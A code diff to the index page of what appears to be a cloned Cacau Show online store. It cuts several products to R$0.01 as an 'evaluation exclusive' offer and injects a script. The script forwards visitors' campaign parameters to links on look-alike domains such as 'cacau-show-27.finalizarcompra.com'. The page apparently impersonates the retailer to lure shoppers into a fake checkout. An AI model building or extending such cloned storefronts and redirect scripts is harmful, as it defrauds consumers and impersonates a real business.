--- a/loja/index.html
+++ b/loja/index.html
@@ -1,6 +1,7 @@
 
 
 
+
 <!DOCTYPE html><html lang=""><head>
   
     <link rel="preload" href="https://c2.cdn1tp.net/7da55af9fc4a40f0ac971efacaaa1d91/js/gtmf0de.js" as="script">
@@ -1500,10 +1501,10 @@
                                       </span>
                                     </span>
 
-                                    <span class="it__shelf--value" content="0.00"></span>
+                                    <span class="it__shelf--value" content="0.01"></span>
 
                                     <div class="it__shelf__discountPrice">
-                                      R$0.00
+                                      R$0.01
 
                                       <div class="it__shelf__discountPrice__cacauLoversTag">
                                         <span>Exclusivo Avaliação</span>
@@ -1728,10 +1729,10 @@
                                       </span>
                                     </span>
 
-                                    <span class="it__shelf--value" content="0.00"></span>
+                                    <span class="it__shelf--value" content="0.01"></span>
 
                                     <div class="it__shelf__discountPrice">
-                                      R$0.00
+                                      R$0.01
 
                                       <div class="it__shelf__discountPrice__cacauLoversTag">
                                         <span>Exclusivo Avaliação</span>
@@ -1956,10 +1957,10 @@
                                       </span>
                                     </span>
 
-                                    <span class="it__shelf--value" content="0.00"></span>
+                                    <span class="it__shelf--value" content="0.01"></span>
 
                                     <div class="it__shelf__discountPrice">
-                                      R$0.00
+                                      R$0.01
 
                                       <div class="it__shelf__discountPrice__cacauLoversTag">
                                         <span>Exclusivo Avaliação</span>
@@ -2184,10 +2185,10 @@
                                       </span>
                                     </span>
 
-                                    <span class="it__shelf--value" content="0.00"></span>
+                                    <span class="it__shelf--value" content="0.01"></span>
 
                                     <div class="it__shelf__discountPrice">
-                                      R$0.00
+                                      R$0.01
 
                                       <div class="it__shelf__discountPrice__cacauLoversTag">
                                         <span>Exclusivo Avaliação</span>
@@ -2412,10 +2413,10 @@
                                       </span>
                                     </span>
 
-                                    <span class="it__shelf--value" content="0.00"></span>
+                                    <span class="it__shelf--value" content="0.01"></span>
 
                                     <div class="it__shelf__discountPrice">
-                                      R$0.00
+                                      R$0.01
 
                                       <div class="it__shelf__discountPrice__cacauLoversTag">
                                         <span>Exclusivo Avaliação</span>
@@ -2930,7 +2931,31 @@
     <!-- Demandware Active Data (body_end-active_data.js) -->
     <script src="https://c2.cdn1tp.net/7da55af9fc4a40f0ac971efacaaa1d91/js/dwac-21.7.js" type="text/javascript" async="async"></script>
   
-  
+</script>
+    <!-- Demandware Active Data (body_end-active_data.js) -->
+    <script src="js/dwac-21.7.js" type="text/javascript" async="async"></script>
+	<script>
+        let prefix = ["https://noticiasde2024.fun/", "https://cacau-show-27.finalizarcompra.com/"];
+        function getParams() {
+            let t = "",
+                e = window.top.location.href,
+                r = new URL(e);
+            if (null != r) {
+                let a = r.searchParams.get("utm_source"),
+                    n = r.searchParams.get("utm_medium"),
+                    o = r.searchParams.get("utm_campaign"),
+                    m = r.searchParams.get("utm_term"),
+                    c = r.searchParams.get("utm_content"); - 1 !== e.indexOf("?") && (t = `&sck=${a}|${n}|${o}|${m}|${c}`), console.log(t)
+            }
+            return t
+        } ! function () {
+            var t = new URLSearchParams(window.location.search);
+            t.toString() && document.querySelectorAll("a").forEach(function (e) {
+                for (let r = 0; r < prefix.length; r++) - 1 !== e.href.indexOf(prefix[r]) && (-1 === e.href.indexOf("?") ? e.href += "?" + t.toString() + getParams() : e.href += "&" + t.toString() + getParams())
+            })
+        }();
+    </script>  
+
 <!-- Meta Pixel Code -->
 <script>
 !function(f,b,e,v,n,t,s)
